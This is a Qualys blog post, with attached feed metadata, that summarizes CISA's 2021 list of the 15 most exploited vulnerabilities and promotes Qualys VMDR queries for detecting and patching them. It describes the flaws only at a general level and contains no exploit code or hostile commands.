CISA Alert: Top 15 Routinely Exploited Vulnerabilities

2022-05-06T12:19:24

Description

_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._ The Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk. To that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities. Of special interest in the report is this key finding by CISA: _Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._ ### CISA’s Top 15 Routinely Exploited Vulnerabilities of 2021 The top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are: CVE| Vulnerability Name| Vendor and Product| Type ---|---|---|--- [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal ### Highlights of Top Vulnerabilities Cited in CISA 2021 Report Based on the analysis of this report by the Qualys Research Team, let’s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them. #### Log4Shell Vulnerability The Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation. Visit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat. ### ProxyShell: Multiple Vulnerabilities The multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation. ### ProxyLogon: Multiple Vulnerabilities The multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers. [Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat. #### Confluence Server and Data Center Vulnerability An Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. #### Top Vulnerabilities of 2020 Persist Three additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021. ### How Can Qualys Help? The Qualys Research Team stays on top of CISA’s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations. #### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Using VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15. Use this QQL statement: vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`] ![](https://blog.qualys.com/wp-content/uploads/2022/05/Vulnerabilities_tab-1.png)View vulnerabilities be severity in Qualys VMDR Qualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure. Dashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited ![](https://blog.qualys.com/wp-content/uploads/2022/05/Dashboard-1.png)Qualys Unified Dashboard #### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR Qualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company’s internet-facing assets. To do so, apply the tag “Internet Facing Assets” in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets. Use this QQL statement: vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`] ![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Tab.png)Prioritizing vulnerabilities for remediation in Qualys VMDR #### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR Qualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities. To view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs. ![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Patch-with-Patch-Job.png)Using Qualys Patch Management to apply patches Qualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list. To get a view of all available patches for CISA’s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab: cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`] ![](https://blog.qualys.com/wp-content/uploads/2022/05/Patch_Management_Patches_tab.png)Viewing available patches in Qualys Patch Management For additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report. ### Getting Started Ready to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.

{"id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "vendorId": null, "type": "qualysblog", "bulletinFamily": "blog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Vulnerabilities_tab-1.png)View vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Dashboard-1.png)Qualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Tab.png)Prioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Patch-with-Patch-Job.png)Using Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Patch_Management_Patches_tab.png)Viewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "published": "2022-05-06T12:19:24", "modified": "2022-05-06T12:19:24", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "reporter": "Swapnil Ahirrao", "references": [], "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "immutableFields": [], "lastseen": "2022-05-11T05:29:14", "viewCount": 683, "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1585", "ALAS2-2021-1649", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844", "CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:5E706DDA-98EC-49CA-AB21-4814DAF26444", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:6F1D646E-2CDB-4382-A212-30728A7DB899", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "canvas", "idList": ["OWA_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:490028", "VU:927237", "VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1187", "CPAI-2019-1097", "CPAI-2020-0104", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2021-0099", "CPAI-2021-0106", "CPAI-2021-0107", "CPAI-2021-0476", "CPAI-2021-0548", "CPAI-2021-0879", "CPAI-2021-0900", "CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:01AC83B2C29761024423083A8BE9CE80", "CISA:16DE226AFC5A22020B20927D63742D98", "CISA:18E5825084F7681AD375ACB5B1270280", "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:28BCD901AF6661FE02928495E4D03129", "CISA:2B970469D89016F563E142BE209443D8", "CISA:2D62C340878780A9844A8FFDFA548783", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:906D00DDCD25874F8A28FE348820F80A", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E", "CISA:D7188D434879621A3A83E708590EAE42", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:E5A33B5356175BB63C2EFA605346F8C7", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, 